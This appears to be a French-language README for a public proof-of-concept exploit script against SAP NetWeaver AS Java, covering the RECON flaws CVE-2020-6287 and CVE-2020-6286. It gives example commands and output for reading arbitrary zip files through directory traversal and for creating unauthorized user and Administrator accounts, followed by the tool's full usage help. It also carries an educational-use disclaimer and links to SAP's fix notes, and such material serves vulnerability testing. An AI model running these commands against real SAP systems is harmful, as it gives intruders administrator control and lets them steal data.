
PoC pour CVE-2020-6287, CVE-2020-6286 (vulnérabilité SAP RECON)
PoC pour CVE-2020-6287, CVE-2020-6286 (vulnérabilité SAP RECON)
Pffff ! RECON (Remotely Exploitable Code On NetWeaver) ? Les gars, vraiment ? C'est le meilleur nom de code que vous ayez trouvé ? :)
Ce script permet de vérifier la vulnérabilité d'absence de contrôle d'autorisation dans SAP LM Configuration Wizard et, en tant que script PoC, exploite le directory traversal dans la méthode queryProtocol.
Le directory traversal permet de télécharger n'importe quel zip depuis le serveur SAP.
Ce projet est créé uniquement à des fins éducatives et ne peut pas être utilisé pour enfreindre la loi ou pour un gain personnel.
L'auteur de ce projet n'est pas responsable des éventuels dommages causés par les matériaux de ce projet
Découverte initiale :
CVE-2020-6287 : Pablo Artuso
CVE-2020-6286 : Yvan 'iggy' G.
Indiquez simplement le nom d'hôte/IP de SAP NW AS Java.
Il existe des options supplémentaires :
-c - vérifier si le serveur SAP est vulnérable à RECON-f - télécharger un fichier zip depuis le serveur SAP-u - créer un utilisateur SAP JAVA avec le rôle Authenticated User-a - créer un utilisateur SAP JAVA avec le rôle AdministratorEx. : Téléchargement d'un fichier zip
~python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved
Ex. : Création d'un utilisateur SAP JAVA
~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created
Ex. : Création d'un utilisateur administrateur SAP JAVA
~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created
~python RECON.py -h
usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
[-u] [-a] [--timeout TIMEOUT] [-v]
PoC for CVE-2020-6287, (RECON)
This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and exploits dir traversal in queryProtocol method
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy
Thanks:
- Spencer McIntyre https://twitter.com/zeroSteiner
Solution: https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665
optional arguments:
-h, --help show this help message and exit
-H HOST, --host HOST Java NW host (default: 127.0.0.1)
-P PORT, --port PORT Java NW web port (default: tcp/50000)
-p PROXY, --proxy PROXY
Use proxy (ex: 127.0.0.1:8080)
-s, --ssl enable SSL
-c, --check just detect vulnerability
-f ZIPFILE, --zipfile ZIPFILE
ZIP file to read. CVE-2020-6286
-u, --user Create simple JAVA user. CVE-2020-6287
-a, --admin Create JAVA user with role "Administrator". CVE-2020-6287
--timeout TIMEOUT HTTP connection timeout in second (default: 10)
-v, --verbose verbose mode